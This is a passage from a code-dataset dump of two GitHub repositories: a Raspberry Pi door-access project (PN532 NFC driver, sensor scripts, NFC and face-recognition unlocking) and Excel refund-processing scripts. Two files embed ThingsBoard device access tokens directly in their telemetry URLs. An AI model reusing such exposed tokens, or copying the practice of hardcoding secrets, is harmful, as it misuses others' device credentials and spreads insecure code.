0x40\nPN532_COMMAND_INCOMMUNICATETHRU = 0x42\nPN532_COMMAND_INDESELECT = 0x44\nPN532_COMMAND_INRELEASE = 0x52\nPN532_COMMAND_INSELECT = 0x54\nPN532_COMMAND_INAUTOPOLL = 0x60\nPN532_COMMAND_TGINITASTARGET = 0x8C\nPN532_COMMAND_TGSETGENERALBYTES = 0x92\nPN532_COMMAND_TGGETDATA = 0x86\nPN532_COMMAND_TGSETDATA = 0x8E\nPN532_COMMAND_TGSETMETADATA = 0x94\nPN532_COMMAND_TGGETINITIATORCOMMAND = 0x88\nPN532_COMMAND_TGRESPONSETOINITIATOR = 0x90\nPN532_COMMAND_TGGETTARGETSTATUS = 0x8A\n\nPN532_RESPONSE_INDATAEXCHANGE = 0x41\nPN532_RESPONSE_INLISTPASSIVETARGET = 0x4B\n\nPN532_WAKEUP = 0x55\n\nPN532_SPI_STATREAD = 0x02\nPN532_SPI_DATAWRITE = 0x01\nPN532_SPI_DATAREAD = 0x03\nPN532_SPI_READY = 0x01\n\nPN532_MIFARE_ISO14443A = 0x00\n\n# Mifare Commands\nMIFARE_CMD_AUTH_A = 0x60\nMIFARE_CMD_AUTH_B = 0x61\nMIFARE_CMD_READ = 0x30\nMIFARE_CMD_WRITE = 0xA0\nMIFARE_CMD_TRANSFER = 0xB0\nMIFARE_CMD_DECREMENT = 0xC0\nMIFARE_CMD_INCREMENT = 0xC1\nMIFARE_CMD_STORE = 0xC2\nMIFARE_ULTRALIGHT_CMD_WRITE = 0xA2\n\n# Prefixes for NDEF Records (to identify record type)\nNDEF_URIPREFIX_NONE = 0x00\nNDEF_URIPREFIX_HTTP_WWWDOT = 0x01\nNDEF_URIPREFIX_HTTPS_WWWDOT = 0x02\nNDEF_URIPREFIX_HTTP = 0x03\nNDEF_URIPREFIX_HTTPS = 0x04\nNDEF_URIPREFIX_TEL = 0x05\nNDEF_URIPREFIX_MAILTO = 0x06\nNDEF_URIPREFIX_FTP_ANONAT = 0x07\nNDEF_URIPREFIX_FTP_FTPDOT = 0x08\nNDEF_URIPREFIX_FTPS = 0x09\nNDEF_URIPREFIX_SFTP = 0x0A\nNDEF_URIPREFIX_SMB = 0x0B\nNDEF_URIPREFIX_NFS = 0x0C\nNDEF_URIPREFIX_FTP = 0x0D\nNDEF_URIPREFIX_DAV = 0x0E\nNDEF_URIPREFIX_NEWS = 0x0F\nNDEF_URIPREFIX_TELNET = 0x10\nNDEF_URIPREFIX_IMAP = 0x11\nNDEF_URIPREFIX_RTSP = 0x12\nNDEF_URIPREFIX_URN = 0x13\nNDEF_URIPREFIX_POP = 0x14\nNDEF_URIPREFIX_SIP = 0x15\nNDEF_URIPREFIX_SIPS = 0x16\nNDEF_URIPREFIX_TFTP = 0x17\nNDEF_URIPREFIX_BTSPP = 0x18\nNDEF_URIPREFIX_BTL2CAP = 0x19\nNDEF_URIPREFIX_BTGOEP = 0x1A\nNDEF_URIPREFIX_TCPOBEX = 0x1B\nNDEF_URIPREFIX_IRDAOBEX = 0x1C\nNDEF_URIPREFIX_FILE = 0x1D\nNDEF_URIPREFIX_URN_EPC_ID = 0x1E\nNDEF_URIPREFIX_URN_EPC_TAG = 0x1F\nNDEF_URIPREFIX_URN_EPC_PAT = 0x20\nNDEF_URIPREFIX_URN_EPC_RAW = 0x21\nNDEF_URIPREFIX_URN_EPC = 0x22\nNDEF_URIPREFIX_URN_NFC = 0x23\n\nPN532_GPIO_VALIDATIONBIT = 0x80\nPN532_GPIO_P30 = 0\nPN532_GPIO_P31 = 1\nPN532_GPIO_P32 = 2\nPN532_GPIO_P33 = 3\nPN532_GPIO_P34 = 4\nPN532_GPIO_P35 = 5\n\nPN532_ACK_STRING = \"0000ff00ff00\"\nPN532_ACK_FRAME = \"\\x00\\x00\\xFF\\x00\\xFF\\x00\"\n\n\ndef millis():\n return int(round(time.time() * 1000))\n\n\nclass PN532(object):\n\n def __init__(self, uart_port=\"COM5\", uart_baudrate=115200):\n self.status = False\n self.message = \"\"\n\n print(\"Port:\" + uart_port)\n try:\n self.ser = serial.Serial(uart_port, uart_baudrate)\n self.ser.timeout = 2\n self.status = True\n except serial.SerialException:\n print(\"Opening port error.\")\n self.status = False\n\n def _uint8_add(self, a, b):\n \"\"\"Add add two values as unsigned 8-bit values.\"\"\"\n return ((a & 0xFF) + (b & 0xFF)) & 0xFF\n\n def _busy_wait_ms(self, ms):\n \"\"\"Busy wait for the specified number of milliseconds.\"\"\"\n start = time.time()\n delta = ms / 1000.0\n while (time.time() - start) <= delta:\n pass\n\n def _write_frame(self, data):\n ack = False\n \"\"\"Write a frame to the PN532 with the specified data bytearray.\"\"\"\n assert data is not None and 0 < len(data) < 255, 'Data must be array of 1 to 255 bytes.'\n # Build frame to send as:\n # - Preamble (0x00)\n # - Start code (0x00, 0xFF)\n # - Command length (1 byte)\n # - Command length checksum\n # - Command bytes\n # - Checksum\n # - Postamble (0x00)\n length = len(data)\n frame = bytearray(length + 7)\n frame[0] = PN532_PREAMBLE\n frame[1] = PN532_STARTCODE1\n frame[2] = PN532_STARTCODE2\n frame[3] = length & 0xFF\n frame[4] = self._uint8_add(~length, 1)\n frame[5:-2] = data\n checksum = reduce(self._uint8_add, data, 0xFF)\n frame[-2] = ~checksum & 0xFF\n frame[-1] = PN532_POSTAMBLE\n # Send frame.\n self.ser.flushInput()\n while (not ack):\n self.ser.write(frame)\n ack = self._ack_wait(1000)\n time.sleep(0.3)\n return ack\n\n def _ack_wait(self, timeout):\n ack = False\n rx_info = \"\"\n start_time = millis()\n current_time = start_time\n while ((current_time - start_time) < timeout and not ack):\n time.sleep(0.12) # Stability on receive\n rx_info += self.ser.read(self.ser.inWaiting())\n current_time = millis()\n if (PN532_ACK_STRING in rx_info.encode(\"hex\")):\n ack = True\n if (ack):\n if (len(rx_info) > 6):\n rx_info = rx_info.split(PN532_ACK_FRAME)\n self.message = ''.join(rx_info)\n else:\n self.message = rx_info\n self.ser.flush()\n return ack\n else:\n self.message = \"\"\n return ack\n\n def _read_data(self, count):\n timeout = 1000\n rx_info = \"\"\n if (self.message == \"\"):\n self._ack_wait(1000)\n else:\n rx_info = self.message\n rx_info = array.array('B', rx_info)\n return rx_info\n\n def _read_frame(self, length):\n \"\"\"Read a response frame from the PN532 of at most length bytes in size.\n Returns the data inside the frame if found, otherwise raises an exception\n if there is an error parsing the frame. Note that less than length bytes\n might be returned!\n \"\"\"\n # Read frame with expected length of data.\n response = self._read_data(length + 8)\n # Check frame starts with 0x01 and then has 0x00FF (preceeded by optional\n # zeros).\n if not (PN532_ACK_FRAME == response.tostring()):\n if response[0] != 0x00:\n raise RuntimeError('Response frame does not start with 0x01!')\n # Swallow all the 0x00 values that preceed 0xFF.\n offset = 1\n while response[offset] == 0x00:\n offset += 1\n if offset >= len(response):\n raise RuntimeError('Response frame preamble does not contain 0x00FF!')\n if response[offset] != 0xFF:\n raise RuntimeError('Response frame preamble does not contain 0x00FF!')\n offset += 1\n if offset >= len(response):\n raise RuntimeError('Response contains no data!')\n # Check length & length checksum match.\n frame_len = response[offset]\n if (frame_len + response[offset + 1]) & 0xFF != 0:\n raise RuntimeError('Response length checksum did not match length!')\n # Check frame checksum value matches bytes.\n checksum = reduce(self._uint8_add, response[offset + 2:offset + 2 + frame_len + 1], 0)\n if checksum != 0:\n raise RuntimeError('Response checksum did not match expected value!')\n # Return frame data.\n return response[offset + 2:offset + 2 + frame_len]\n else:\n return \"no_card\"\n\n def wakeup(self):\n # msg = '\\x55\\x55\\x00\\x00\\x00'\n msg = '\\x55\\x55\\x00\\x00\\x00'.encode()\n self.ser.write(msg)\n\n def call_function(self, command, response_length=0, params=[], timeout_sec=1):\n \"\"\"Send specified command to the PN532 and expect up to response_length\n bytes back in a response. Note that less than the expected bytes might\n be returned! Params can optionally specify an array of bytes to send as\n parameters to the function call. Will wait up to timeout_secs seconds\n for a response and return a bytearray of response bytes, or None if no\n response is available within the timeout.\n \"\"\"\n # Build frame data with command and parameters.\n data = bytearray(2 + len(params))\n data[0] = PN532_HOSTTOPN532\n data[1] = command & 0xFF\n data[2:] = params\n # Send frame and wait for response.\n if not self._write_frame(data):\n return None\n # Read response bytes.\n response = self._read_frame(response_length + 2)\n # Check that response is for the called function.\n if not (response == \"no_card\"):\n if not (response[0] == PN532_PN532TOHOST and response[1] == (command + 1)):\n raise RuntimeError('Received unexpected command response!')\n # Return response data.\n return response[2:]\n else:\n return response\n\n def begin(self):\n \"\"\"Initialize communication with the PN532. Must be called before any\n other calls are made against the PN532.\n \"\"\"\n self.wakeup()\n\n def get_firmware_version(self):\n \"\"\"Call PN532 GetFirmwareVersion function and return a tuple with the IC,\n Ver, Rev, and Support values.\n \"\"\"\n response = self.call_function(PN532_COMMAND_GETFIRMWAREVERSION, 4)\n if response is None:\n raise RuntimeError(\n 'Failed to detect the PN532! Make sure there is sufficient power (use a 1 amp or greater power supply), the PN532 is wired correctly to the device, and the solder joints on the PN532 headers are solidly connected.')\n return (response[0], response[1], response[2], response[3])\n\n def SAM_configuration(self):\n \"\"\"Configure the PN532 to read MiFare cards.\"\"\"\n # Send SAM configuration command with configuration for:\n # - 0x01, normal mode\n # - 0x14, timeout 50ms * 20 = 1 second\n # - 0x01, use IRQ pin\n # Note that no other verification is necessary as call_function will\n # check the command was executed as expected.\n self.call_function(PN532_COMMAND_SAMCONFIGURATION, params=[0x01, 0x14, 0x01])\n\n def read_passive_target(self, card_baud=PN532_MIFARE_ISO14443A, timeout_sec=1):\n \"\"\"Wait for a MiFare card to be available and return its UID when found.\n Will wait up to timeout_sec seconds and return None if no card is found,\n otherwise a bytearray with the UID of the found card is returned.\n \"\"\"\n # Send passive read command for 1 card. Expect at most a 7 byte UUID.\n response = self.call_function(PN532_COMMAND_INLISTPASSIVETARGET,\n params=[0x01, card_baud],\n response_length=17)\n # If no response is available return None to indicate no card is present.\n if response is None:\n return None\n if not (response == \"no_card\"):\n # Check only 1 card with up to a 7 byte UID is present.\n if response[0] != 0x01:\n raise RuntimeError('More than one card detected!')\n if response[5] > 7:\n raise RuntimeError('Found card with unexpectedly long UID!')\n # Return UID of card.\n return response[6:6 + response[5]]\n else:\n return response\n\n def mifare_classic_authenticate_block(self, uid, block_number, key_number, key):\n \"\"\"Authenticate specified block number for a MiFare classic card. Uid\n should be a byte array with the UID of the card, block number should be\n the block to authenticate, key number should be the key type (like\n MIFARE_CMD_AUTH_A or MIFARE_CMD_AUTH_B), and key should be a byte array\n with the key data. Returns True if the block was authenticated, or False\n if not authenticated.\n \"\"\"\n # Build parameters for InDataExchange command to authenticate MiFare card.\n uidlen = len(uid)\n keylen = len(key)\n params = bytearray(3 + uidlen + keylen)\n params[0] = 0x01 # Max card numbers\n params[1] = key_number & 0xFF\n params[2] = block_number & 0xFF\n params[3:3 + keylen] = key\n params[3 + keylen:] = uid\n # Send InDataExchange request and verify response is 0x00.\n response = self.call_function(PN532_COMMAND_INDATAEXCHANGE,\n params=params,\n response_length=1)\n return response[0] == 0x00\n\n def mifare_classic_read_block(self, block_number):\n \"\"\"Read a block of data from the card. Block number should be the block\n to read. If the block is successfully read a bytearray of length 16 with\n data starting at the specified block will be returned. If the block is\n not read then None will be returned.\n \"\"\"\n # Send InDataExchange request to read block of MiFare data.\n response = self.call_function(PN532_COMMAND_INDATAEXCHANGE,\n params=[0x01, MIFARE_CMD_READ, block_number & 0xFF],\n response_length=17)\n # Check first response is 0x00 to show success.\n if response[0] != 0x00:\n return None\n # Return first 4 bytes since 16 bytes are always returned.\n return response[1:]\n\n def mifare_classic_write_block(self, block_number, data):\n \"\"\"Write a block of data to the card. Block number should be the block\n to write and data should be a byte array of length 16 with the data to\n write. If the data is successfully written then True is returned,\n otherwise False is returned.\n \"\"\"\n assert data is not None and len(data) == 16, 'Data must be an array of 16 bytes!'\n # Build parameters for InDataExchange command to do MiFare classic write.\n params = bytearray(19)\n params[0] = 0x01 # Max card numbers\n params[1] = MIFARE_CMD_WRITE\n params[2] = block_number & 0xFF\n params[3:] = data\n # Send InDataExchange request.\n response = self.call_function(PN532_COMMAND_INDATAEXCHANGE,\n params=params,\n response_length=1)\n return response[0] == 0x00\n"
},
{
"alpha_fraction": 0.526035487651825,
"alphanum_fraction": 0.5443786978721619,
"avg_line_length": 23.492753982543945,
"blob_id": "35fb8a33dccae181cc33c251096831f821cd9df5",
"content_id": "d56cdd2d0020de45c46ad10ae8ac0bdbcf025fe5",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1690,
"license_type": "permissive",
"max_line_length": 63,
"num_lines": 69,
"path": "/acceleration.py",
"repo_name": "XeonHis/IoTA",
"src_encoding": "UTF-8",
"text": "from mpu6050 import mpu6050\nimport time\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef acceleration():\n sensor = mpu6050(0x68)\n time_dic = []\n start_time = time.time()\n # print(start_time)\n # print(start_time + 3)\n while True:\n if time.time() < (start_time + 5.1):\n # start_time = time.time()\n accelerometer_data = sensor.get_accel_data()\n time_dic.append(accelerometer_data)\n time.sleep(0.1)\n # end_time = time.time()\n # print(end_time-start_time)\n # print(time_dic)\n else:\n # print(time_dic)\n # break\n return time_dic\n\n\ndef data_handle(time_data):\n time_x_data = []\n time_y_data = []\n time_z_data = []\n\n count = len(time_data)\n\n for i in range(count):\n time_x_data.append(time_data[i]['x'])\n time_y_data.append(time_data[i]['y'])\n time_z_data.append(time_data[i]['z'])\n # print(time_x_data)\n # print(time_y_data)\n # print(time_z_data)\n return [count, time_x_data, time_y_data, time_z_data]\n\n\ndef plt_data():\n count, x_data, y_data, z_data = data_handle(acceleration())\n x_avg = sum(x_data) / count\n y_avg = sum(y_data) / count\n z_avg = sum(z_data) / count\n x = np.arange(0, count / 10, 0.1)\n y1 = np.array(x_data)\n y2 = np.array(y_data)\n y3 = np.array(z_data)\n\n plt.plot(x, y1, color='r', label='x_acc')\n plt.plot(x, y2, color='b', label='y_acc')\n plt.plot(x, y3, color='y', label='z_acc')\n\n plt.legend()\n\n plt.xlabel('time')\n plt.ylabel('m/s')\n\n plt.show()\n print('acc_avg',x_avg, y_avg, z_avg)\n\n\nif __name__ == '__main__':\n plt_data()\n"
},
{
"alpha_fraction": 0.4739776849746704,
"alphanum_fraction": 0.5297397971153259,
"avg_line_length": 15.8125,
"blob_id": "94f0651ff5ae18831e9a571421a070dd625771f3",
"content_id": "a5a855caf55f26cfec23e35074194fb0f91974ab",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 538,
"license_type": "permissive",
"max_line_length": 33,
"num_lines": 32,
"path": "/test/test_pcf8591.py",
"repo_name": "XeonHis/IoTA",
"src_encoding": "UTF-8",
"text": "import smbus\nimport time\n\n\ndef Print(value):\n if value == 0:\n print('no magnet')\n if value == 1:\n print('magnet north')\n if value == -1:\n print('magnet south')\n\n\naddress = 0x48\nA0 = 0x40\n\nbus = smbus.SMBus(11)\nstatus = 0\n\nwhile True:\n bus.write_byte(address, A0)\n data = bus.read_byte(address)\n if 5 > data - 133 > -5:\n value = 0\n if data < 128:\n value = -1\n if data > 138:\n value = 1\n if data != status:\n Print(value)\n status = value\n time.sleep(0.2)\n"
},
{
"alpha_fraction": 0.5451894998550415,
"alphanum_fraction": 0.5510203838348389,
"avg_line_length": 33.349998474121094,
"blob_id": "283bd3b2fc3f7bfd80b290df9d09e1d0339d65b4",
"content_id": "608e51a9b8cb052abca4d7d067c279fe90634984",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 686,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 20,
"path": "/btn.py",
"repo_name": "XeonHis/IoTA",
"src_encoding": "UTF-8",
"text": "import RPi.GPIO as GPIO\nimport time\nfrom open import open_door\n\ndef btn_press():\n while True:\n # print('btn_start')\n btn_pin = 26\n GPIO.setwarnings(False)\n GPIO.setmode(GPIO.BCM)\n GPIO.setup(btn_pin, GPIO.IN, pull_up_down=GPIO.PUD_UP)\n\n if GPIO.input(btn_pin) == 0:\n current_time = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n print('press open at ', current_time)\n open_door(current_time)\n with open('/home/pi/ZYDEMO/iota/open_detail.txt', 'a') as log_fp:\n log_fp.write('button open at ' + str(current_time) + '\\n')\n log_fp.flush()\n time.sleep(2)"
},
{
"alpha_fraction": 0.48503485321998596,
"alphanum_fraction": 0.4965149760246277,
"avg_line_length": 33.35211181640625,
"blob_id": "482d3879528e6688cc65d4879ce55bd5447d3887",
"content_id": "5ed6962b68f0dd737e417dae9daa4020a354d07c",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2439,
"license_type": "permissive",
"max_line_length": 116,
"num_lines": 71,
"path": "/nfc.py",
"repo_name": "XeonHis/IoTA",
"src_encoding": "UTF-8",
"text": "import subprocess\nimport time\nfrom open import open_door\nimport requests\n\n\ndef check(nfc_list):\n with open('/home/pi/ZYDEMO/iota/nfc_list.txt', 'r') as nfc_fp:\n data = nfc_fp.readlines()\n # print(nfc_list)\n if nfc_list in data[0]:\n # print(nfc_list[0])\n current_time = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n print('nfc open at ', current_time)\n open_door(current_time)\n with open('/home/pi/ZYDEMO/iota/open_detail.txt', 'a') as log_fp:\n log_fp.write(\n 'nfc ' + nfc_list + ' open at ' + str(current_time) + '\\n')\n log_fp.flush()\n\n nfc_payload = \"{{\\\"card_no\\\": {}}}\".format(str(nfc_list))\n requests.post(url='https://demo.thingsboard.io/api/v1/iK0zWkznWEoYqBnmAtQf/telemetry', data=nfc_payload)\n\n time.sleep(2)\n # return True\n # count = len(data)\n # for i in range(count):\n # temp_data = data[i].split(',')\n # r_nfcid = temp_data[0]\n # r_sakid = temp_data[1]\n # r_atsid = temp_data[2]\n # if nfc_list[2] is 0:\n # if nfc_list[0] == r_nfcid and nfc_list[1] == r_sakid:\n # return True\n # else:\n # if nfc_list[1] == r_sakid and nfc_list[2] == r_atsid:\n # return True\n # if i == count:\n # return False\n\n\ndef nfc():\n while True:\n time.sleep(0.2)\n output = str(subprocess.Popen(['nfc-list'], stdout=subprocess.PIPE, shell=True).communicate()[0])\n # print(output)\n nfc_start = 'NFCID'\n # sak_start = 'SEL_RES'\n # ats_start = 'ATS'\n nfc_index = output.find(nfc_start)\n # sak_index = output.find(sak_start)\n nfcid = output[nfc_index + 8:nfc_index + 24].replace(' ', '')\n\n # if ats_start in output:\n # ats_index = output.find(ats_start)\n # atsid = output[ats_index + 4:ats_index + 14]\n # sakid = output[sak_index + 9:ats_index]\n # else:\n # sakid = output[sak_index + 9:sak_index + 17]\n # atsid = 0\n # if nfcid !='istuseslibnfc':\n # print(nfcid)\n # check(nfcid)\n # print(sakid)\n # print(atsid)\n # return [nfcid, sakid, atsid]\n # return nfcid\n check(nfcid)\n\n# temp = check(nfc())\n# print(temp)\n"
},
{
"alpha_fraction": 0.44242823123931885,
"alphanum_fraction": 0.49191686511039734,
"avg_line_length": 32.30769348144531,
"blob_id": "207a4b77e8559d71c1fe995c4f0da0e2d938d53a",
"content_id": "e0e2048950a53c7e848c7a914a379087db9baf2a",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3491,
"license_type": "permissive",
"max_line_length": 125,
"num_lines": 91,
"path": "/camera_servo.py",
"repo_name": "XeonHis/IoTA",
"src_encoding": "UTF-8",
"text": "# coding = utf-8\nimport face_recognition\nimport cv2\nimport RPi.GPIO as GPIO\nimport time\nfrom face_rec import face_rec\nfrom open import open_door\nimport requests\n\n\ndef setServoAngle(servo, angle):\n '''\n :param servo 控制舵机的引脚编号,这取决于你,我用的分别是17和27\n :param angle 舵机的位置,范围是:0到180,单位是度\n return: None\n '''\n GPIO.setmode(GPIO.BCM)\n GPIO.setwarnings(False)\n GPIO.setup(servo, GPIO.OUT)\n pwm = GPIO.PWM(servo, 50)\n pwm.start(8)\n dutyCycle = angle / 18. + 2.\n pwm.ChangeDutyCycle(dutyCycle)\n time.sleep(0.3)\n pwm.stop()\n GPIO.cleanup()\n\n\n# x0, y0 = 80, 0\n# setServoAngle(18, x0) # x axis\n# setServoAngle(17, y0) # y axis\n\ndef start_camera():\n while True:\n # 创建视频对象,打开摄像头\n video_capture = cv2.VideoCapture('http://192.168.123.122:8080/?action=stream')\n ret, pframe = video_capture.read()\n # print(ret,'image capture')\n # 释放视频对象\n # video_capture.release()\n if pframe is not None:\n frame = cv2.resize(pframe, (0, 0), fx=0.25, fy=0.25) # 这里将分辨率缩小为1/4,故比例系数增大为4倍,现在是0.078125*4 = 0.3125\n # frame = pframe\n output = frame[:, :, ::-1]\n\n # 确定脸的位置\n face_locations = face_recognition.face_locations(output)\n if face_locations:\n x = (face_locations[0][1] + face_locations[0][3]) / 2\n y = (face_locations[0][0] + face_locations[0][2]) / 2\n print(x, y) # 输出脸中心到右上顶点的水平和垂直距离\n # else:\n # x, y = 80, 60 # 如果没有脸则让舵机保持不动,相当于脸在中央(这时的分辨率为160*120)\n\n # 计算出舵机应该移动的角度,正负与你舵机的安装方式有关\n # dx = (80 - x) * 0.2375\n # dy = -(y - 60) * 0.2375\n\n # if abs(dx) >= 3: # 设置一个阈值,当角度大于3时,才移动,避免舵机一直在原地抖动,下同\n # x0 += dx\n # if x0 > 180: # 设置界限,超出范围不再转动,下同\n # x0 = 180\n # elif x0 < 0:\n # x0 = 0\n # setServoAngle(18, x0) # 水平方向的舵机控制\n #\n # if abs(dy) >= 3: # 设置阈值\n # y0 += dy\n # if y0 > 180:\n # y0 = 180\n # elif y0 < 0:\n # y0 = 0\n # print('y0', y0)\n # setServoAngle(17, y0) # 垂直方向的舵机控制\n\n flag = face_rec(video_capture, output, face_locations)\n # print(flag)\n # return flag\n if flag is not None:\n if flag[0] is True:\n current_time = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n\n open_door(current_time)\n\n face_payload = \"{{\\\"face\\\": \\\"{}\\\"}}\".format(str(flag[1]))\n requests.post(url='https://demo.thingsboard.io/api/v1/fYCni97AxcU7lWxyrhvU/telemetry', data=face_payload)\n\n with open('/home/pi/ZYDEMO/iota/open_detail.txt', 'a') as log_fp:\n log_fp.write(\n 'person ' + flag[1] + ' open at ' + str(current_time) + '\\n')\n log_fp.flush()\n"
}
] | 21 |
Raymondhsm/PythonDoExcel
|
https://github.com/Raymondhsm/PythonDoExcel
|
f674325c620d98807de1a06fa0c6ca0be2a772b4
|
e4efbf41566fb033e2729b159fb579dba13bfdb8
|
70d8f3e9d8d4d4f9cc78f5d7555edff741a5363f
|
refs/heads/master
| 2020-08-30T06:40:38.761351 | 2019-11-29T06:24:51 | 2019-11-29T06:24:51 | 218,293,513 | 3 | 1 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6346733570098877,
"alphanum_fraction": 0.6346733570098877,
"avg_line_length": 25.864864349365234,
"blob_id": "1bb14339847b998ffcef9283816b6f21fd6486b6",
"content_id": "c8f12701a205df9cdc9b60b5b5d28c3f5cbbe9e4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2278,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 74,
"path": "/src/guide.py",
"repo_name": "Raymondhsm/PythonDoExcel",
"src_encoding": "UTF-8",
"text": "from os import listdir,system\nfrom openpyxl import load_workbook,Workbook\n\nfrom error import ErrorList,Error,Warning,processException\nfrom log import Logger\nimport utils\nimport saleAmount\nimport refund\nimport profit\nimport notfound\n\n\ndef __doSA(path = \"./\"):\n _option = input(\"是否要做金额录入,是就输入点东西,否就啥也不输:\")\n _doSA = False if _option == \"\" else True\n Logger.addLog(\"输入:{},退款{}\".format(_option, _doSA))\n\n _option = input(\"是否要做退款录入,是就输入点东西,否就啥也不输:\")\n _doRefund = False if _option == \"\" else True\n Logger.addLog(\"输入:{},退款{}\".format(_option, _doRefund))\n\n _summaryPath = utils.getReportPath(path, \"summary\")\n try:\n print(\"正在打开汇总表...\")\n _summary = load_workbook(_summaryPath)\n except:\n processException()\n \n # 获取notfound表\n NF = notfound.NotFound()\n _notfoundTable = NF.getNotfoundTable()\n\n # 处理销售额\n if _doSA:\n SA = saleAmount.SaleAmount(_summary,_notfoundTable)\n SA.processDir(path)\n\n # 处理退款\n if _doRefund:\n _refundPath = utils.getReportPath(path,\"refund\",onlyXlsx=False, canSkip=True)\n\n if _refundPath is not None:\n RF = refund.Refund(_summary, _notfoundTable)\n RF.processRefundInfo(_refundPath)\n\n # 保存文件\n _summaryName = input(\"输点什么东西当输出文件名呗:\")\n if _summaryName == \"\":\n _summary.save(path + \"/summary.xlsx\")\n else:\n _summary.save(path+ \"/\" + _summaryName)\n Logger.addPrefabLog(Logger.LOG_TYPE_SAVE,_summaryName)\n\n NF.save()\n\n\ndef __doPF(path = \"./\"):\n _originPath = utils.getReportPath(path,\"originfile\",False)\n _updatePath = utils.getReportPath(path,\"updatefile\")\n\n PF = profit.Profit(_originPath, _updatePath)\n PF.processProfitUpdate()\n PF.save()\n pass\n\n\ndef doGuide(path = \"./\"):\n option = input(\"输入点东西就进入更新成本功能,什么都不输就进入更新汇总表功能:\")\n if option == \"\":\n Logger.addLog(\"输入:{},处理saleAmount。\".format(option))\n __doSA(path)\n else :\n Logger.addLog(\"输入:{},处理更新成本\".format(option))\n __doPF(path)\n\n\n"
},
{
"alpha_fraction": 0.5042446851730347,
"alphanum_fraction": 0.5086142420768738,
"avg_line_length": 38.85572052001953,
"blob_id": "25f27cec703e2b9f4a27a7c48f4d3fd86bacc0a0",
"content_id": "ee7965059690198bf63aeb7e988111220ac062de",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8040,
"license_type": "no_license",
"max_line_length": 171,
"num_lines": 201,
"path": "/src/refund.py",
"repo_name": "Raymondhsm/PythonDoExcel",
"src_encoding": "UTF-8",
"text": "from error import processException, ErrorList, Error, NotFound\nfrom log import Logger\nimport utils\nfrom xlrd import open_workbook\n\n\nclass refundInfo:\n def __init__(self, _platform):\n self.accountList = []\n self.locationList = []\n self.refundList = []\n self.length = 0\n self.platform = _platform\n\n def add(self, _account, _location, _refund):\n self.accountList.append(_account)\n self.locationList.append(_location)\n self.refundList.append(_refund)\n self.length += 1\n\n def get(self, index):\n return self.accountList[index], self.locationList[index], self.refundList[index]\n\n\nclass Refund:\n \n def __init__(self, _summary, _notfoundTable):\n Logger.addLog(\"CREATE refund!!\")\n self.summary = _summary\n self.notfoundTable = _notfoundTable\n self.__correctCount = 0\n self.__failCount = 0\n\n \n def processRefundInfo(self, _filePath):\n\n try:\n Logger.addLog(\"OPEN REFUND FILE!! Path = \" + _filePath)\n _refundBook = open_workbook(_filePath,formatting_info=True)\n _refundSheets = _refundBook.sheets()\n\n except Exception:\n processException()\n\n for _refundsheet in _refundSheets:\n _infoType = _refundsheet.name\n\n print(\"正在处理 \" + _infoType + \" 退款金额...\")\n Logger.addLog(\"PROCESS {} 退款\".format(_infoType))\n\n _refundInfoList = self.__getRefundInfo(_refundsheet)\n self.__setRefundInfo(_infoType, _refundInfoList)\n\n\n def __getRefundInfo(self, _refundTable):\n try:\n _refundInfoList = []\n\n # use the merge cell to locate the useful cell\n for merge in _refundTable.merged_cells:\n rs, re, cs, ce = merge\n\n # ignore some merge cell\n if re-rs != 1 and ce-cs != 2:\n continue\n\n # ignore when it has no info\n if _refundTable.cell_value(re,cs) == \"\":\n continue\n \n # read the platform\n _platform = _refundTable.cell_value(rs,cs).strip().lower()\n if utils.is_contains_chinese(_platform):\n ErrorList.addError(Error(\"REFUND ERROR! Type = \" + _refundTable.name + \"\\tPlatform: \" + _platform, \"We can not identify the chinese as platform name\"))\n continue\n else:\n _refundInfoInstance = refundInfo(_platform)\n\n _row = re + 1 if _refundTable.cell_value(re,cs) == \"账号\" else re\n while True: \n if _row >= _refundTable.nrows: \n break\n _acclo = _refundTable.cell_value(_row,cs)\n\n if _acclo == \"\":\n break\n else:\n # split the account and location\n if '(' in _acclo:\n _accloList = _acclo.split(\"(\",1)\n _account = _accloList[0].strip()\n _location = _accloList[1].split(')',1)[0].strip()\n elif '(' in _acclo:\n _accloList = _acclo.split(\"(\",1)\n _account = _accloList[0].strip()\n _location = _accloList[1].split(')',1)[0].strip()\n else:\n _acclo = _acclo.strip()\n _accloList = _acclo.split(\" \",1)\n _account = _accloList[0].strip()\n\n # set the default value\n if len(_accloList) == 1:\n _location = \"CN\"\n else:\n _location = _accloList[1].strip()\n \n # read the refund\n _refund = _refundTable.cell_value(_row,cs+1)\n \n _refundInfoInstance.add(_account, _location, _refund)\n \n # add 1 to row\n _row += 1\n \n # add to the list\n _refundInfoList.append(_refundInfoInstance)\n except Exception:\n processException()\n\n return _refundInfoList\n\n\n def __setRefundInfo(self, _infoType, _refundInfoList):\n try:\n # if can not find correct type, return\n if _infoType not in self.summary.sheetnames:\n ErrorList.addError(Error(\"REFUND ERROR\",\"can not find correct sheet: \" + _infoType))\n return \n _refundTable = self.summary[_infoType]\n\n for _refundInstance in _refundInfoList:\n _index, _offset = utils.findPlatformIndex(_refundTable, _refundInstance.platform)\n \n # if can not find platform, send error\n if _index == -1:\n ErrorList.addError(Error(\"REFUND ERROR\",\"can not find correct platform: \" + _refundInstance.platform))\n continue\n \n # create the dictionary \n accountDict = {}\n for _row in range(_index, _index + _offset):\n _account = _refundTable[\"D\" + str(_row)].value.strip()\n _locationList = _refundTable[\"F\" + str(_row)].value.split(' ')\n _location = _locationList[1].strip() if len(_locationList) > 1 else 